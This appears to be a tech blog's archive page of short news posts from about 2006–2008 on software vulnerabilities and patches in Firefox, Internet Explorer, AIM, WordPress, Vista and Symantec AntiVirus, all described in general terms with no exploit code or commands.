Remember, that whole Firefox download day thing that we got so amped up about? Us too.
Remember when their servers screwed the pooch for most of "Download Day"? Us too.
How about that vulnerability that affected all 8 zillion of us who downloaded version 3? Yep, we remember that too.
Now you can put all those rough memories behind and sleep easy. Today, Mozilla "officially" announcedsetting the record, with 8,002,530 downloads on the release day of Firefox 3. It's fair to point out that, nothing was broken here... this was a new record, hence "setting" and not "breaking".
Will you remember Mozilla set the Guinness World Record for the most software downloads in 24 hours on June 18th, 2008? Neither will we.
But congrats on still being #2 Firefox. Let us know when that changes and we'll jump around and party like it's 2035!
Core Security's Aviv Raff reports that AOL's AIM client has a severe vulnerability. A user can send code in an instant message that will execute code on your computer. You don't even have a click a link. As long as you're accepting incoming messages, a hacker could wreak havoc on your system.
In a demonstration, Raff sent ZDNet's Ryan Naraine a message that cause his Windows calculator to open. AOL is working on a patch, and recommends users upgrade to the latest beta version of AIM. But Raff says that so far each patch that has been issued has been easily circumvented.
AOL says a full solution will be available by mid-October. In the meantime, we recommend rejecting messages from any unknown source and hoping that your buddies aren't running infected PCs. And if you want to be extra careful, you can access your buddy list using an alternative program like Meebo, Pidgin, or Trillian.
The problem is that Firefox "did not percent-encode spaces and double-quotes in URIs handed off to external programs." Essentially that means that hackers could create web sites that would launch arbitrary code on your computers when visited with the Firefox browser.
Odds are you'll get the update through Firefox's auto-update feature. But if your browser hasn't prompted you to download Firefox 2.0.0.6 yet, you can grab it from the Firefox homepage.
It hasn't been a good weekend for social ranking sites. Security vulnerabilities were uncovered at Digg-competitor Reddit and Pligg, a site that lets you create your own Digg clone. The security problems at each site were unrelated and have been patched.
Basically, the problem at Reddit was that the site let users upload malicious code in their comments that could grant access to your account login and other information. For the most part, Reddit users played with vulnerability by uploading benign code. The exploit has been fixed, and now any user who uploaded such code has had the text replaced with "I am a terrible person."
The Pligg vulnerability was even more serious, allowing an attacker to take over an entire website. Pligg has released a patch, and recommends anyone running a Pligg site upgrade immediately.
You know those web sites that have kooky animated cursors? Yeah, don't surf to those with Internet Explorer unless you want to leave your computer vulnerable to hackers.
Microsoft has issued a notice that it is investigating the vulnerability. If users visit a web site or view an e-mail containing hacked .ani files (the animated cursor file type), so Microsoft's advice for the moment: be careful when opening unsolicited emails or browsing new web sites. A long term fix is still a few steps away.
The vulnerability appears to affect Internet Explorer 6 and 7 running on Windows XP SP2. IE7 on Vista doesn't appear to be affected.
Breaking news on the internets right now as Matt over at WordPress is reporting some serious issues with packages of WordPress 2.1.1 downloaded over the past 3-4 days. According to a blog post, a malicious intruder gained access to the wordpress.org servers and modified the files being made available for download. How exactly this happened is still unknown.
The long-and-short of the situation is this: if you downloaded and installed the most recent version of WordPress from wordpress.org in the last few days, you weren't downloading the official release– you were downloading a modified version that likely includes some sort of back-door.
Although only a subset of in-the-wild copies of 2.1.1 contain the vulnerability, the development team has declared the entire release "dangerous," and highly suggest all users upgrade to 2.1.2.
Brian Krebs at the Washington Post's Security Fix blog wanted to put together some statistics on how long it took major software providers to fix vulnerabilities last year. He started with Microsoft, and found that Internet Explorer was vulnerable to critical flaws for a total of 284 days. That's more than 9 months.
In fact, there were at least 98 days when Microsoft had not issued a fix even though criminals were actively exploiting some of those flaws to grab personal data from Internet Explorer users.
Krebs says he ran his data by Microsoft before posting it on the blog, and that aside from some minor issues, the company didn't bring up anything that would change the overall finding.
By comparison, Firefox was only vulnerable to a serious security threat for one 9 day period last year. Be sure to tune in tomorrow when Krebs plans to take a look at the number of security patches issued for Microsoft Office in 2006.
About a month after the business release of Windows Vista, and a month before its consumer release, hackers and security researchers have uncovered at least six major security flaws in Microsoft's brand new operating system, the New York Times is reporting. Among flaws discovered are one that allows malicious sites to install malware on a victim's computer and one that allows user permissions to be altered on a corporate network, which could allow malware to be installed without authorization. In addition, one Japanese hacker is offering to sell Vista security flaws for $50,000.
I'm not sure whether Microsoft will have a chance to update Vista before it ships to consumers on January 31, or whether they will package fixes as mandatory updates that will be installed as soon as a new Vista PC connects to the internet. Or whether they'll just plug their ears and continue to proclaim that Vista is the most secure OS ever.
According to security firm Secunia, the just-released Internet Explorer 7 contains a "Redirection Information Disclosure" vulnerability, which allows one site to fetch data from another site through the browser, which opens it up to all kinds of cross-site scripting (XSS) attacks. Interestingly, the same vulnerability has been known and unpatched in IE6 since April. It's one thing not to patch an old browser, but seems quite another to release a brand new browser with the same vulnerability that you've been aware of for six months. If you're running Internet Explorer and want to see the exploit in action, Secunia has set up a demo page.
Nick Bradbury is a good guy. You can get an idea of this by searching on his name in Technorati, and seeing what other bloggers have to say about him. The reason I bring this up is that I was blown away by the way in which Nick tackled the recent revelation that there is a security vulnerability in almost all current RSS aggregators that could allow a nefarious publisher to get a script to run on the reader's computer. Nick is the developer behind the absolutely excellent FeedDemon feed reader, which NewsGator purchased about a year ago. In Nick's case, due to the manner in which he uses Internet Explorer's rendering engine in "Internet Zone" mode, the exploit doesn't work on FeedDemon. That fact notwithstanding, Nick dove into the problem and came up with a fix to eliminate the vulnerability altogether. The new version of FeedDemon, 2.0.0.25, is available as of today, and includes a substantial performance enhancement.
All that is well and good, and for those of us that own a copy of FeedDemon the new version is a very worthwhile upgrade. But that's not what this story is about.
Have you ever wondered why Firefox makes you wait three seconds before you can click on the Install button when you want to install an extension? Most users (self included) assume that it's just to make users read the dialog. It turns out that's not the case--Jesse Ruderman explains that it's actually a security feature to keep people from unwittingly installing malicious code. He describes an ingenious exploit in which a user is presented, for example, a security (CAPTCHA) image to type in. JavaScript is used to initiate an extension installation when the user starts typing, and when the user types 'y' or enter, it triggers the 'Accept' or 'Install' button, allowing the malicious software to be installed. Since many users type faster than they could respond to the box popping up, the software is installed before they can react. (If you're confused, head over to Ruderman's blog, he explains it better than I can.) The delay in Firefox gives the user time to react and stop typing. Mozilla describes the solution in bug 162020, but the same vulnerability exists in other browsers, most notably Internet Explorer and its ilk.
Symantec moved quickly to squash a security vulnerability in its AntiVirus Corporate Edition which was disclosed by eEye Digital Security last week, and according to CRN Australia an official fix is now being rolled out in the form of an IPS signature update. An unnamed executive from another security vendor, however, says they are "scratching their heads in disbelief" regarding the choice, because hackers could reverse-engineer the signatures and get "a blueprint of the vulnerability." It seems to me that any fix released could likewise be reverse-engineered, but it may be true that an IPS signature is easier to dissect. Let's just hope all of those Corporate users have their AntiVirus set to keep those signatures up-to-date.
According to eEye Digital Security, the latest version of Symantec AntiVirus contains a security flaw that could be used to take control of the victim's PC "without any user action." eEye spokesperson Mike Puterbaugh describes the hole as "definitely wormable," i.e. malicious software could gain access to a machine, change or delete files at will, and spread itself to other machines. Symantec says they "are evaluating the issue now and, if necessary, will provide a prompt response and solution." Puterbaugh says no proof-of-concept code has been released, but warns that hackers may already know about the flaw.
Microsoft's Patch Tuesday last week meant a sigh of relief for sysadmins dreading the nasty Internet Explorer
vulnerability discovered last month,
but any relief was short-lived as the round of patches has apparently led to a plague of bugs and incompatibilities. Last
week's patches are causing "causing system hangs, Windows crashes and the appearance of strange dialog boxes"
and interfering with apps from Google, HP, and even Microsoft's own Windows Media Player. One company is also saying
that the new Internet Explorer plugin behavior resulting from Microsoft's patent dispute with Eolas is
causing problems for enterprise customers, who are having to click several times to use ActiveX controls. As usual,
none of these problems will be fixed until the second Tuesday of next month.
Rather than wait two more weeks until Patch Tuesday as Microsoft has opted to do, two companies have released
their own unofficial patches for the newly-disclosed Internet Explorer vulnerability that is rapidly being exploited in
the wild. Security firms eEye and Determina have both announced the availability of unofficial hotfixes that they're
touting as temporary solutions until Microsoft gets its act together. Both companies have released the source code of
their patches for review, but installing either is still an at-your-own-risk undertaking. eEye's information and
download page can be found here, and Determina's here.
Remember, that whole Firefox download day thing that we got so amped up about? Us too.
